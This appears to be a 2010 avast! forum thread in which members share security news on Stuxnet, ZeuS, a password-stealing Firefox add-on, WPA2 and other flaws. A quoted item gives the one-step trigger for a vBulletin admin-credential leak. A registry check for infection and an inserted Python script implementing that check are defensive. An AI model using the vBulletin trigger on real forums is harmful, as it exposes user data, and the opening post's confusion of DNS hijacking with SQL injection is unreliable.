I don't know exactly how they went about this hack, but it seems to have something to do with modifying the DNS records of the hacked domains, which in effect re-directs prospective visitors to a site designed by the hackers. This particular exploit is known as "SQL Injection vulnerability".
source(s):
Microsoft NZ Hack:
http://w0rm.us/tag/peace-crew
http://www.nzherald.co.nz/technology/news/article.cfm?c_id=5&objectid=1...
NATO Hack:
http://news.softpedia.com/news/Palestinian-Supporters-Hack-NATO-and-U-S-Arm...
DNS Record Types:
http://en.wikipedia.org/wiki/List_of_DNS_record_types
SQL Injection:
http://en.wikipedia.org/wiki/SQL_injection
Use the encrypted.google.com service for searches, that is https and not that easy to hack, or do your searches at
Ixquick, they also do not retain your search queries, http://ixquick.com/do/metasearch.pl
But looking for keygens is the royal route into your computer for malcode, because it often comes bundled with it..
polonus
-
Hi malware fighters,
A FOOBAR by GoogleChrome as some take it - Flash Player installed by default with their latest update of the browser, a security nightmare. Google says: you, the user, do not have to install anything and maintain anything, we'll do that for you. The option to fall back on a player you installed yourself is still there in the browser, but for that you have to opt out. But even as Flash Player comes sandboxed in GoogleChrome, isn't it better to go on with HTML5 and let Flash die a silent death? It is and was a security nightmare, folks.
polonus
-
But looking for keygens is the royal route into your computer for malcode, because it often comes bundled with it..
polonus
Exactly, it is the best way to find new malware and send it to avast! labs. I hate piracy.... it is one of the causes of the recessions and crises. Including lost jobs.
Edit: Thanks for your info polonus.
-
Not sure if the Beeb was a little late reporting this... http://news.bbc.co.uk/2/hi/technology/10473495.stm
Has anybody used the workaround? http://support.microsoft.com/kb/2219475
-
Has anybody used the workaround? http://support.microsoft.com/kb/2219475
Installed ages ago on my XP Pro system when it was released June 14, 2010
-
You 'installed' a work around? Or did you simply execute it?
-
You 'installed' a work around? Or did you simply execute it?
I executed the Fix it
-
Hi malware fighters,
Adobe should do something for security = disable javascript by default: http://www.sophos.com/blogs/gc/g/2010/06/30/adobe-disable-javascript-default/
polonus
-
Hi malware fighters,
How the MS help-and-support-hole is now actively being exploited: http://blogs.technet.com/b/mmpc/archive/2010/06/30/attacks-on-the-windows-help-and-support-center-vulnerability-cve-2010-1885.aspx
polonus
-
Most dangerous sites for trojan, watch here regularly: http://blog.urlvoid.com/dangerous-websites-used-to-spread-trojans/
Also visit this site for this week's top threats online: http://wam.dasient.com/wam/infection_library_index
polonus
-
Hi malware fighters,
How the MS help-and-support-hole is now actively being exploited: http://blogs.technet.com/b/mmpc/archive/2010/06/30/attacks-on-the-windows-help-and-support-center-vulnerability-cve-2010-1885.aspx
polonus
I'm not convinced Microsoft Help and Support is altogether secure in any regard at the moment. For XP anyway.
I posted a while ago - 'And partly because for the first time I am having update problems with IE (the kb979909 issue, which is .NET downloads), if I don't solve soon and with easy method (no uninstall) then I will probably post the problem to the forum'.
Well still having a few problems on one of my systems. I have opened a new topic to outline the issue.
http://forum.avast.com/index.php?topic=61431.0
-
I'm not convinced Microsoft Help and Support is altogether secure in any regard at the moment. For XP anyway.
Attacks on the Windows Help and Support Center Vulnerability (CVE-2010-1885) (http://blogs.technet.com/b/mmpc/archive/2010/06/30/attacks-on-the-windows-help-and-support-center-vulnerability-cve-2010-1885.aspx) convinces me the protocol isn't secure. The protocol can be exploited by any malicious or hacked website.
If you're using XP or Server 2003, enable the FixIt (http://support.microsoft.com/kb/2219475), NOW.
-
Has anybody used the workaround? http://support.microsoft.com/kb/2219475
Installed ages ago on my XP Pro system when it was released June 14, 2010
I am making some progress -
Technical Information (Analysis)
Trojan:Win32/Orsam!rts is a name used for trojan detections that have been added to our signatures after advanced automated analysis.
The generic nature of this detection means that the malicious behaviors exhibited by files detected as Trojan:Win32/Orsam!rts are highly variable and may vary from one instance of this detection to the next.
No further information is currently available on this threat. However, should we receive a significant number of reports, then a specific detection will be added to our signatures and a detailed analysis will be added to the encyclopedia.
-
Thanks for all the replies.
I decided to install the FixIt!
Best wishes,
Avastfan1
-
Hi malware fighters,
Watch out for the most aggressive malware attackers: http://mtc.sri.com/live_data/attackers/
polonus
-
I seem to have solved my issue concerning updates to .NET Framework.
I'm sorry but I cannot say whether it had anything to do with 'Attacks on the Windows Help and Support Center Vulnerability (CVE-2010-1885)', despite my suspicion that something had gone amiss in the Microsoft Update routine. Ultimately, I reinstalled / upgraded Windows Installer using the following link -
http://www.microsoft.com/downloads/details.aspx?familyid=5A58B56F-60B6-4412-95B9-54D056D6F9F4&displaylang=en
Then I installed the remaining .NET downloads. The install process seemed labored but did complete with KB974417 being the final install. I was informed by Microsoft Update that I had hidden this install for the time being, something which I cannot recall doing, or in fact do not know how to do. (but in the heat of a moment I may have been presented with an option and followed the recommendation).
Now for Trojan:Win32/Orsam!rts -
figuring I had an MS issue and so could be solved by MS itself, I downloaded and ran Microsoft Security Essentials, which generated the orsam detection when I chose to run the Internet Explorer browser at one stage. As far as I can tell - but almost certainly - the orsam detection was a False Positive generated by having both MSE and avast!antivirus running as resident on the same system.
-
***
Mis-placed notice :
http://forum.avast.com/index.php?topic=50356.msg426510#msg426510
It had to happen sooner or later ... and it has been later than I thought it would be.
These have always been insecure applications.
***
-
Hi malware fighters,
New 0-day in IE8: http://reversemode.com/index.php?option=com_content&task=view&id=68&Itemid=1
A design error in the browser: http://www.securityfocus.com/bid/41247/info
POC: http://reversemode.com/index.php?option=com_content&task=view&id=68&Itemid=1
pol
-
Hi malware fighters,
Microsoft to end security support for Windows XP Service Pack 2 · Hackers' nirvana on horizon as Microsoft ends security fixes for XP SP2: http://lastwatchdog.com/hackers-nirvana-horizon-microsofts-ends-patching/
polonus
-
Hi malware fighters,
Microsoft to end security support for Windows XP Service Pack 2 · Hackers' nirvana on horizon as Microsoft ends security fixes for XP SP2: http://lastwatchdog.com/hackers-nirvana-horizon-microsofts-ends-patching
See this: Hundreds of millions of vulnerable PCs
A service pack is a collection of updates, feature enhancements and security fixes delivered in a single download. Microsoft released SP2 in August 2004 mainly to beef up security. Then in April 2008, the company released SP3 with less fanfare, recommending that all XP units be updated. Yet more than two years later, thousands of companies worldwide have not yet done so.
http://lastwatchdog.com/hackers-nirvana-horizon-microsofts-ends-patching
The USA is quite high on the most vulnerable list of infected systems. :o
-
Hi YoKenny,
Yep, and what if there is a console with "embedded Windows XP2", and someone plays an encoding smart card trick there; how irresponsible can admins and security staff be, "infantilized" by society around them and brainwashed alike to accept such insecure systems and not upgrade,
polonus
-
Hi YoKenny,
Yep, and what if there is a console with "embedded Windows XP2", and someone plays an encoding smart card trick there; how irresponsible can admins and security staff be, "infantilized" by society around them and brainwashed alike to accept such insecure systems and not upgrade
I know Insanity: doing the same thing over and over again and expecting different results.
Learn from yesterday, live for today, hope for tomorrow. The important thing is not to stop questioning.
Only two things are infinite, the universe and human stupidity, and I'm not sure about the former.
Albert Einstein
-
Hi Kenny & polonus,
nice info, nice map, nice quote...! ;)
I stumbled over admins with no knowledge at all, just doing the same as they 'learned' years before... ::)
asyn
-
Week in review: YouTube, iTunes, The Pirate bay hacked, Facebook scams and Twitter kits
Here's an overview of some of last week's most interesting news, interviews and articles
http://www.net-security.org/secworld.php?id=9558
nmb
-
Yeah, all the Jason Bieber videos were hacked through a cross-site scripting (XSS) vulnerability, replacing comments with big red words.
-
Hi malware fighters,
What banks are being attacked by zeus 3 and what countries are targeted?
http://community.ca.com/blogs/securityadvisor/archive/2010/07/12/zeus-version-3-target-spain-germany-uk-and-usa-banks.aspx
See: http://www.malwaredomains.com/wordpress/?p=1081
http://www.malwaredomainlist.com/mdl.php?search=zeus&colsearch=All&quantity=100
Remarkable the zeus3 trojan only targets Spain, Germany, United States and the U.K.,
pol
-
***
Secunia Half Year Report for 2010 shows interesting trends
The report does a good job of discussing the current trends and statistics and highlights what they are seeing for vulnerabilities.
http://isc.sans.edu/diary.html
***
-
Mozilla snuffs password pilfering Firefox add-on
http://www.theregister.co.uk/2010/07/15/mozilla_blocklists_malicious_addon/
http://blog.mozilla.com/addons/2010/07/13/add-on-security-announcement/
Issue
An add-on called “Mozilla Sniffer” was uploaded on June 6th to addons.mozilla.org. It was discovered that this add-on contains code that intercepts login data submitted to any website, and sends this data to a remote location. Upon discovery on July 12th, the add-on was disabled and added to the blocklist, which will prompt the add-on to be uninstalled for all current users.
Impact to users
If a user installs this add-on and submits a login form with a password field, all form data will be submitted to a remote location. Uninstalling the add-on stops this behavior. Anybody who has installed this add-on should change their passwords as soon as possible.
Status
Mozilla Sniffer has been downloaded approximately 1,800 times since its submission and currently reports 334 active daily users. All current users should receive an uninstall notification within a day or so. The site this add-on sends data to seems to be down at the moment, so it is unknown if data is still being collected.
Mozilla Sniffer was not developed by Mozilla, and it was not reviewed by Mozilla. The add-on was in an experimental state, and all users that installed it should have seen a warning indicating it is unreviewed. Unreviewed add-ons are scanned for known viruses, trojans, and other malware, but some types of malicious behavior can only be detected in a code review.
-
Hi malware fighters,
Disabling autorun is not enough, new virus vector found -windows-shortcut-flaw (no it is no feature!): "The virus is able to infect the OS in a complete new way and fashion, via a hole in the way lnk-files are being processed, without using an autorun.inf file (so nothing can be detected on the malicious USB stick)", this according to an advisory on VirusBlokAda. Re analysis: http://www.f-secure.com/weblog/archives/new_rootkit_en.pdf &
http://www.securelist.com/en/blog/269/Myrtus_and_Guava_Episode_1
So be aware handling these Flash drives/USB-sticks .....opening any file manager or IE is enough to place two Realtek signed drivers there to inject malicious code into System Processes in order to hide malcode there...
Seems this malware was specifically developed for spying on corporations - i.e. looking for Siemens WinCC SCADA systems & similar big distributed systems for energy management etc., re: http://krebsonsecurity.com/2010/07/experts-warn-of-new-windows-shortcut-flaw - the malware can get epidemic proportions, so use a good USB av solution:
http://www.mxone.net/en/ or http://download.cnet.com/Panda-USB-Vaccine/3000-2239_4-11040112.html
polonus
-
Hi malware fighters,
Disabling autorun is not enough, new virus vector found -windows-shortcut-flaw (no it is no feature!): "The virus is able to infect the OS in a complete new way and fashion, via a hole in the way lnk-files are being processed, without using an autorun.inf file (so nothing can be detected on the malicious USB stick)", this according to an advisory on VirusBlokAda. Re analysis: http://www.f-secure.com/weblog/archives/new_rootkit_en.pdf &
http://www.securelist.com/en/blog/269/Myrtus_and_Guava_Episode_1
So be aware handling these Flash drives/USB-sticks .....opening any file manager or IE is enough to place two Realtek signed drivers there to inject malicious code into System Processes in order to hide malcode there...
Seems this malware was specifically developed for spying on corporations - i.e. looking for Siemens WinCC SCADA systems & similar big distributed systems for energy management etc., re: http://krebsonsecurity.com/2010/07/experts-warn-of-new-windows-shortcut-flaw - the malware can get epidemic proportions, so use a good USB av solution:
http://www.mxone.net/en/ or http://download.cnet.com/Panda-USB-Vaccine/3000-2239_4-11040112.html
polonus
mxone.net blocked by hpHosts:
http://hosts-file.net/default.asp?s=mxone.net+
http://hosts-file.net/?s=www.mxone.net&x=29&y=6 • EMD - sites engaged in malware distribution
This classification is assigned to websites engaged in the distribution of malware (e.g. adware, spyware, trojans and viruses etc).
Sites with this classification typically either contain files (e.g. cracks, keygens, adware, spyware, trojans, viruses et al) or lead to such via (for example) "fake scanners" or other social engineering and misleading tactics.
Panda-USB-Vaccine/3000-2239_4-11040112.html looks like an advertisement for Panda Cloud Antivirus ???
The only one I trust is Flash_Disinfector.exe by sUBs 8)
http://www.bleepingcomputer.com/forums/lofiversion/index.php/t229158.html
-
Hi YoKenny,
Clean here: Report 2010-07-15 21:03:59 (GMT 1)
Website _mxone.net
Domain Hash c6cfdae769f9e964e905ab272c77cc6b
IP Address N/A [SCAN]
IP Hostname N/A
IP Country -- (--)
AS Number N/A
AS Name N/A
Detections 0 / 17 (0 %)
Status CLEAN
Scanning site with: AMaDa CLEAN
Scanning site with: BrowserDefender CLEAN
Scanning site with: Finjan CLEAN
Scanning site with: Google Diagnostic CLEAN
Scanning site with: hpHosts CLEAN
Scanning site with: Malware Patrol CLEAN
Scanning site with: MalwareDomainList CLEAN
Scanning site with: MyWOT UNRATED
Scanning site with: Norton SafeWeb UNRATED
Scanning site with: ParetoLogic URL Clearing House CLEAN
Scanning site with: PhishTank CLEAN
Scanning site with: SURBL CLEAN
Scanning site with: Threat Log CLEAN
Scanning site with: TrendMicro Web Reputation CLEAN
Scanning site with: URIBL CLEAN
Scanning site with: Web Security Guard UNRATED
Scanning site with: ZeuS Tracker CLEAN
SiteTruth say's: This site is safe.
Google Safe Browsing say's: This site is safe.
Threat Name: No Threat FOUND
Threat Definitions: 806935
Engine Version: 0.96.1
Host IP: 174.132.148.58
Link Status: Clean
File Size: 14.87 KB
Time Finished: 5.01 secs
Overall result: This site is secure,
polonus
-
New infections are not reported quickly enough ::)
-
Hi YoKenny,
Look here: http://www.wilderssecurity.com/showthread.php?t=236298
http://site-press.com/antivirus/antivirus-news/mx-one-usb-antivirus-tutorial-33-instalacion-en-usb/
This is from a scam site: http://www.articlesbase.com/security-articles/how-to-remove-mx-one-automatically-mx-one-removal-instructions-1910840.html
Re: http://www.remove-malware.com/forums/viewtopic.php?f=22&t=6070
Only if you try to download illegally will you be confronted with: htxp://filespump.com/index.html
which was seized by US govmnt: http://mybroadband.co.za/vb/showthread.php/246753-Filespump.com-siezed-by-US-goverment
polonus
-
Hi YoKenny,
Look here: http://www.wilderssecurity.com/showthread.php?t=236298
March 16th, 2009, 03:06 PM :o
http://site-press.com/antivirus/antivirus-news/mx-one-usb-antivirus-tutorial-33-instalacion-en-usb/
This is from a scam site: http://www.articlesbase.com/security-articles/how-to-remove-mx-one-automatically-mx-one-removal-instructions-1910840.html
Re: http://www.remove-malware.com/forums/viewtopic.php?f=22&t=6070
Only if you try to download illegally will you be confronted with: htxp://filespump.com/index.html
which was seized by US govmnt: http://mybroadband.co.za/vb/showthread.php/246753-Filespump.com-siezed-by-US-goverment
polonus
You are quoting old references.
Its now July and those references are as old as sour milk or moldy cheese
-
Hi YoKenny,
But what can protect us then from this new USB stick root kit malware?
MS is studying it, it has already infected over 16.000 computers worldwide...starting from India,
where it was created with 2 Realtek certified drivers...so nothing shows up on the malcoded stick,
does not need autorun to infect, shortcut link and hoopla...
and we have malware here with a certificate (not valid anymore but it is not checked for that),
what is next MS certified malware?
polonus
-
Backgrounds of the current Twitter Spam mails increase
http://www.emsisoft.com/en/kb/articles/tec100714/
asyn
-
Week in review: New ZeuS version and multi-stage attacks cyber attacks
http://www.net-security.org/secworld.php?id=9594
nmb
-
Hi folks,
New Ariad hole will hunt Windows XP SP2 forever, so get SP3 or use this tool, from here:
http://blog.didierstevens.com/programs/ariad/
polonus
-
MS confirms Windows shortcut zero-day flaw
http://www.theregister.co.uk/2010/07/19/win_shortcut_vuln/
Microsoft has confirmed the presence of a zero-day vulnerability in Windows, following reports of sophisticated malware-based hacking attacks on industrial control systems that take advantage of the security flaw.
Security shortcomings in the Windows shortcut (.lnk files) are being exploited by the Stuxnet rootkit, an information stealing threat that targets industrial and power plant control systems. The malware - which has been detected in the wild - executes automatically if an infected USB stick is accessed in Windows Explorer.
The attack features rootkit components designed to hide the presence of the information-stealing payload on compromised systems. The digital certificate, assigned to legitimate firm Realtek Semiconductor, used to sign the rootkit components in the malware was revoked by VeriSign last week following discovery of the attack.
sounds like Panda USB vaccine is implicitly advised ;D
see here too:
http://www.microsoft.com/technet/security/advisory/2286198.mspx
MS workaround:
Disable the displaying of icons for shortcuts
...I think I'll wait for the hotfix instead :D
-
Hi malware fighters,
This could become a big threat: http://blogs.forbes.com/firewall/2010/07/13/millions-of-home-routers-vulnerable-to-web-hack/
pol
-
Stuxnet returns bigtime: http://blogs.technet.com/b/mmpc/archive/2010/07/16/the-stuxnet-sting.aspx
-
Stuxnet returns bigtime: http://blogs.technet.com/b/mmpc/archive/2010/07/16/the-stuxnet-sting.aspx
posted above ;)
-
Hi Logos,
This is demonstrating what an enormous threat is formed by the collective Zeus zombie army, because that is how the driver certificates to make the stuxnet malware were initially compromised and could be further abused to design the new malware. Zeus/kneber botnet collectives etc. go under the radar of normal av initially (see my postings in the virus and worms, last detection zero detection rate), and in the USA alone 3.6 million computers are no longer owned by the folks that sit between their keyboards and chairs, but the machines are owned by malcreant bot herders, that even got a cybercriminal licence key to operate this menace machine herd (lowsec\local.ds.). Here is a message from someone who is not aware of that particular fact:
http://seclists.org/honeypots/2010/q2/3
A clean system by default should not have any unique ID made by the malware, so if you run the following:
REG QUERY "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Network" /v UID
-- or --
REG QUERY "HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Network" /v UID
an infected machine would return the following data in the following format:
<computer name>_<string id> (for example, COMP1_00038EB9)
TN security info
The net has become more and more broken now and the situation is not getting any better soon, my friends, and this is a very realistic statement not for the users that know how to Safe hex and be well protected but to the poor unaware clicking-on-everything-that-moves user.... and all we can do is preaching to the choir or as the desolate in the desert that was never heard, specifically by parties that do not want to change the security situation as we have it,
polonus
Link to wake you all up: http://www.symantec.com/connect/blogs/spyeye-bot-versus-zeus-bot
http://www.securelist.com/en/blog/2128/Will_the_real_Zeus_botnet_please_stand_up
analysis on the malware's complexity: http://blog.threatexpert.com/2009_09_01_archive.html
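The UID check polonus quotes above, as an added example that is not part of the post: the script parses the text REG QUERY prints for the two keys, decides whether a UID value matches the <computer name>_<string id> format, and on Windows can run reg.exe itself. The sample outputs are constructed for the demonstration; the regex's host-name and hex-digit limits are my assumptions from the COMP1_00038EB9 example.

```python
import os
import re
import subprocess
import sys
from typing import Dict, Optional

# The two keys named in the post; a clean machine has no UID value under either.
UID_KEYS = (
    r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Network",
    r"HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Network",
)

# Format given in the post: <computer name>_<string id>, e.g. COMP1_00038EB9.
# Assumption: NetBIOS-style host name (max 15 chars) and an eight-hex-digit id.
UID_PATTERN = re.compile(r"^(?P<host>[A-Za-z0-9-]{1,15})_(?P<sid>[0-9A-Fa-f]{8})$")

# Constructed sample outputs, shaped like what reg.exe prints.
INFECTED_SAMPLE = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Network
    UID    REG_SZ    COMP1_00038EB9

"""
CLEAN_SAMPLE = r"""
ERROR: The system was unable to find the specified registry key or value.
"""


def parse_reg_query(output: str) -> Dict[str, str]:
    """Collect the 'name  REG_TYPE  data' rows of REG QUERY output into a dict."""
    values: Dict[str, str] = {}
    for line in output.splitlines():
        parts = line.strip().split(None, 2)
        # Value rows have exactly three columns and a REG_* type in the middle;
        # the key path line and the ERROR line do not, so they are skipped.
        if len(parts) == 3 and parts[1].upper().startswith("REG_"):
            values[parts[0]] = parts[2].strip()
    return values


def uid_indicator(output: str, computer_name: Optional[str] = None) -> Optional[dict]:
    """Return the decoded UID if it matches the infected-machine format, else None.

    When computer_name is given, host_matches records whether the prefix is this
    machine's own name, which is what the post says the malware writes there.
    """
    data = parse_reg_query(output).get("UID")
    if data is None:
        return None
    match = UID_PATTERN.match(data)
    if not match:
        return None
    host = match.group("host")
    return {
        "host": host,
        "string_id": match.group("sid").upper(),
        "host_matches": None if computer_name is None else host.upper() == computer_name.upper(),
    }


def check_local_machine() -> Dict[str, Optional[dict]]:
    """Run the two REG QUERY commands from the post on a Windows host via reg.exe."""
    if sys.platform != "win32":
        raise RuntimeError("reg.exe is only available on Windows")
    own_name = os.environ.get("COMPUTERNAME")
    results: Dict[str, Optional[dict]] = {}
    for key in UID_KEYS:
        proc = subprocess.run(["reg", "query", key, "/v", "UID"],
                              capture_output=True, text=True)
        # reg.exe reports a missing value on stderr with a non-zero exit code;
        # both streams are parsed so the ERROR line is handled like any other.
        results[key] = uid_indicator(proc.stdout + proc.stderr, own_name)
    return results


if __name__ == "__main__":
    print("constructed infected sample:", uid_indicator(INFECTED_SAMPLE, "COMP1"))
    print("constructed clean sample:", uid_indicator(CLEAN_SAMPLE))
    if sys.platform == "win32":
        for key, hit in check_local_machine().items():
            print(key, "->", hit or "no UID value")
```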
-
Updated Microsoft advisory : http://blogs.technet.com/b/msrc/archive/2010/07/20/security-advisory.aspx
Fixit arrives : http://support.microsoft.com/kb/2286198
nmb
tags( ;)) : LNK exploit, Stuxnet.
-
I don't know whether this was posted.
GUI for metasploit now available : http://pauldotcom.com/2010/07/metasploit-new-gui.html
Warning! Only for people who know what they are doing - (advanced users).
nmb
-
Black DDoS
- Analysis by Kaspersky labs.
Cybercriminals use a variety of bots to conduct DDoS attacks on Internet servers. One of the most popular tools is called Black Energy. To date, Kaspersky Lab has identified and implemented detection for over 4,000 modifications of this malicious program. In mid-2008 malware writers made significant modifications to the original version, creating Black Energy 2 (which Kaspersky Lab detects as Backdoor.Win32.Blakken). This malicious program is the subject of this article.
http://www.securelist.com/en/analysis/204792126/Black_DDoS
nmb
-
Hi forum friends,
Researchers at F-Secure have written articles on the stuxnet rootkit (which makes use of the LNK flaw). Here are a few links to their weblog [latest last]:
1. Espionage Attack Uses LNK Shortcut Files (http://www.f-secure.com/weblog/archives/00001986.html).
2. More Analysis of Case LNK Exploit (http://www.f-secure.com/weblog/archives/00001987.html).
3. Zero-Day Vulnerability in Windows Shell (http://www.f-secure.com/weblog/archives/00001989.html).
4. Code for Shortcut Zero-Day Exploit is Public (http://www.f-secure.com/weblog/archives/00001991.html).
5. Update on Security Advisory 2286198 (http://www.f-secure.com/weblog/archives/00001992.html).
6. Another Signed Stuxnet Binary (http://www.f-secure.com/weblog/archives/00001993.html).
7. LNK Vulnerability: Embedded Shortcuts in Documents (http://www.f-secure.com/weblog/archives/00001994.html).
nmb
-
vBulletin vuln gifts admin credentials to unwashed masses
http://www.theregister.co.uk/2010/07/23/vbulletin_vuln/
Websites using software from vBulletin have been stung by a critical vulnerability that makes it trivial to steal credentials needed to administer site panels.
The flaw in version 3.8.6 of vBulletin makes it possible for anyone with a web browser to infiltrate a forum's back end, where sensitive data about users is often stored. The forumware giant issued a patch on Wednesday, but a simple Google search on Friday revealed that scores of users have yet to apply it, meaning their administrative user names and passwords are wide open.
Exploiting the bug is as easy as entering “database” (minus quotes) in the search box of a forum's FAQ page. Vulnerable sites respond by returning everything that's needed to view sensitive user information or make administrative changes.
The patch updates users to version 3.8.6 PL1. Users who want to make sure the fix has worked should check for the string “database_ingo,” which is removed once the new version has correctly been installed.
-
Hi malware fighters,
Info found that the Stuxnet worm was specifically developed to be used as a spyware tool against Iran: http://www.cio.com.au/article/201801/designing_an_effective_web-based_analysis_tool_analyse_software_needs/
http://www.hackinthebox.org/modules.php?op=modload&name=News&file=article&sid=37173&mode=thread&order=0&thold=0
To cleanse the infection the sysclean tool used here comes from TrendMicro: http://downloadcenter.trendmicro.com/index.php?pattern_file=1
polonus
-
Hi malware fighters,
New LNK vulnerability using varieties of known malware: http://www.f-secure.com/weblog/archives/00001996.html
polonus
-
Hi malware fighters,
Stay alert to hidden iFrame injection attacks...
* In the past, it was common for attackers to inject their malicious Iframes at the bottom/end of the webpage. Attackers are now injecting malicious Iframes anywhere in the webpage.
* Many websites which were found in past months to be infected by malicious hidden Iframes appear to still be infected with them, meaning most website owners or hosting providers are not policing the content that they are serving on the web.
Our data shows many previously infected websites are still infected with hidden malicious Iframes today. Due to different obfuscation techniques, detection by a majority of the antivirus vendors remains poor; avast has very good detection with the shields, and web browser users can get protected with the use of extensions like NoScript and RequestPolicy in the Mozilla browser types (like Firefox and Flock etc.), see for the latest of these attacks http://twitter.com/dasient_new_mal
polonus
-
Critical vulnerability in QuickTime 7.6.6
http://www.h-online.com/security/news/item/Critical-vulnerability-in-QuickTime-7-6-6-1046499.html
asyn
-
WPA2 security hole discovered
http://www.infosecurity-us.com/blog/2010/7/23/wpa2-exposed-with-hole-196-vulnerability/189.aspx
asyn
-
WPA2 security hole discovered
http://www.infosecurity-us.com/blog/2010/7/23/wpa2-exposed-with-hole-196-vulnerability/189.aspx
asyn
well the thing is that all LAN communication is also encrypted in Win7, which already excludes the stealing of data, even if WPA2 was broken. edit after further reading: >>> what remains is possible access to the router, and the stealing of the connection...live examples and reports needed here ;D
edit: found other articles:
http://www.pcmag.com/article2/0,2817,2366994,00.asp
http://gizmodo.com/5596919/gulp-security-researcher-discovers-wpa2-vulnerability
okay: the attack is "may be" only possible from an insider, someone on your LAN, not from the outside ;) ... waiting for a demo ;D
and now:
The vulnerability will be presented at BlackHat Arsenal by AirTight Networks senior wireless security researcher Md Sohail Ahmad [...]
Ahmad claims that this behavior is to spec (page 196 of the IEEE 802.11 standard, hence "Hole 196") and that there's nothing to fix in the implementation. The only way to protect your network is to monitor all wireless traffic for it. AirTight networks, incidentally, sells Wireless Intrusion Prevention Systems.
;D
-
live examples and reports needed here ;D
AirTight will present a public Webinar on August 4 at 11am Pacific.
http://www.airtightnetworks.com/home/airtight-media/webinars/wpa2-hole196-vulnerability.html
asyn
-
Hi Logos,
Just fire up Fiddler 2.0 in a browser and see what is being sent chunked; whatever is encrypted, with one click we will make it unchunked, decompressed and readable. If a machine can render something, then someone somehow can show what is to be rendered for human eyes to decipher... just logical, Logos, just logical, and you just need the rendering tool, sniffer, whatever,
polonus
-
Hi Logos,
Just fire up Fiddler 2.0 in a browser and see what is being sent chunked; whatever is encrypted, with one click we will make it unchunked, decompressed and readable. If a machine can render something, then someone somehow can show what is to be rendered for human eyes to decipher... just logical, Logos, just logical, and you just need the rendering tool, sniffer, whatever,
polonus
hmm...Polonus...seems a bit more complicated than that ::) ... as Fiddler2 will only allow you to decrypt your own traffic, the one that your browser already decrypts ;D
back to topic...we already know from the article links I posted that the potential flaw in WPA2 only affects the LAN if an insider is originating the procedure. And Asyn: read again the end of my last post :D
-
Hi Logos,
It appears from these revelations that everything comes pre-backdoored by design, then; the uninformed find out about this
only after it has been revealed,
polonus
-
Hi Logos,
It appears from these revelations that everything comes pre-backdoored by design, then; the uninformed find out about this
only after it has been revealed,
polonus
the company who "reveals" the flaw, and is supposed to demonstrate it, is also a company selling wi-fi monitoring software, and they already advise to use that, saying that the protocol can't be patched anyway and the only way out is to acquire >>> full time monitoring software.
-
Good read,thanks.
-
Hi malware fighters,
Firefox warning abused by rogue av: http://www.f-secure.com/weblog/archives/00001997.html
polonus
-
Hi malware fighters,
Firefox warning abused by rogue av: http://www.f-secure.com/weblog/archives/00001997.html
polonus
I don't use Firefox ;D
-
Hi malware fighters,
Firefox warning abused by rogue av: http://www.f-secure.com/weblog/archives/00001997.html
polonus
I don't use Firefox ;D
Then I guess this message wasn't meant for you. :o
-
Details of 100 million Facebook users published online
http://www.msnbc.msn.com/id/38463013/ns/technology_and_science-security/
http://www.bbc.co.uk/news/technology-10802730
-
Details of 100 million Facebook users published online
I posted a related link here:
http://forum.avast.com/index.php?topic=28748.msg526326#msg526326
asyn
-
Details of 100 million Facebook users published online
I posted a related link here:
http://forum.avast.com/index.php?topic=28748.msg526326#msg526326
asyn
oh, I see you found 70 millions more ;D
-
Hi malware fighters,
Most online applications are full of holes, and in the "virus and worms" section of the forums we will find the results in the form of the number of sites reported to be hacked.
Using Blind Elephant to test, 100% of phpBB forum software installations were found to be vulnerable to attacks. For other software the results were: Mediawiki (95%), Joomla! (92%), MovableType (91%), phpMyAdmin (85%), Moodle (74%), Drupal (70%) and SPIP (65%), and these results are not much better than with the first-mentioned software. Only WordPress has a far cleaner slate, with only 4% of versions having holes in them. The reason for this success is its easy updating routines.
Blind Elephant can be found here: http://blindelephant.sourceforge.net/
pol
-
Critical vulnerabilities in TYPO3
http://typo3.org/teams/security/security-bulletins/typo3-sa-2010-012
asyn
-
Hi malware fighters,
OpenDNS improperty hole: http://archives.neohapsis.com/archives/fulldisclosure/2010-07/0412.html
Install NoScript to be better protected at the router level,
polonus
-
Android rootkit demonstrated
http://www.h-online.com/security/news/item/Android-rootkit-demonstrated-1049183.html
asyn
-
Blind Elephant can be found here: http://blindelephant.sourceforge.net/
Some more info on BE...
asyn
Blind Elephant paper here:
https://community.qualys.com/servlet/JiveServlet/downloadBody/1351-102-3-1577/BlindElephant_WebApp_Fingerprinting.pdf
Presentation @ BlackHat here:
https://community.qualys.com/servlet/JiveServlet/previewBody/1401-102-1-1629/BlindElephant%20-%20BlackHatUSA2010%20-%20Community.pdf
-
Hacker shows how he can intercept cell phone calls
http://mobile.venturebeat.com/2010/07/31/hacker-shows-how-he-can-intercept-cell-phone-calls-for-1500/
-
Hacker shows how he can intercept cell phone calls
http://mobile.venturebeat.com/2010/07/31/hacker-shows-how-he-can-intercept-cell-phone-calls-for-1500/
Some info already posted here: ;)
http://forum.avast.com/index.php?topic=62445.0
asyn
-
Critical hole in Adobe Reader
http://www.h-online.com/security/news/item/Critical-hole-in-Adobe-Reader-and-nobody-wants-to-know-1050622.html
asyn
-
Cisco security products vulnerable to DoS
http://www.cisco.com/warp/public/707/cisco-sa-20100804-fwsm.shtml
http://www.cisco.com/warp/public/707/cisco-sa-20100804-asa.shtml
asyn
-
Microsoft Security Bulletin Advance Notification for August 2010
http://www.microsoft.com/technet/security/Bulletin/ms10-aug.mspx
Looks like there's going to be a bunch of updates.
-
Hi malware fighters,
Keep an eye on this known attack list: http://site-scanner.com/News/kasl.php
polonus
-
Microsoft Security Bulletin Advance Notification for August 2010
http://www.microsoft.com/technet/security/Bulletin/ms10-aug.mspx
Looks like there's going to be a bunch of updates.
Nah, only 7 Critical and 3 Important updates, nothing on dial-up, I should have those downloaded before the next patch Tuesday ;D
-
No patch for serious vulnerability in Windows XP SP2 - ever
http://www.norman.com/security_center/blog/per_olav_forland/91402/en
-
Microsoft Security Bulletin Advance Notification for August 2010
http://www.microsoft.com/technet/security/Bulletin/ms10-aug.mspx
Looks like there's going to be a bunch of updates.
Nah, only 7 Critical and 3 Important updates, nothing on dial-up, I should have those downloaded before the next patch Tuesday ;D
Hey David, Maybe it would be faster for MS to mail you the patches on DVD. :D
-
Don't feel bad David. I had to do them on 2 PC's with dial-up. Talk about having a very long night and day!
-
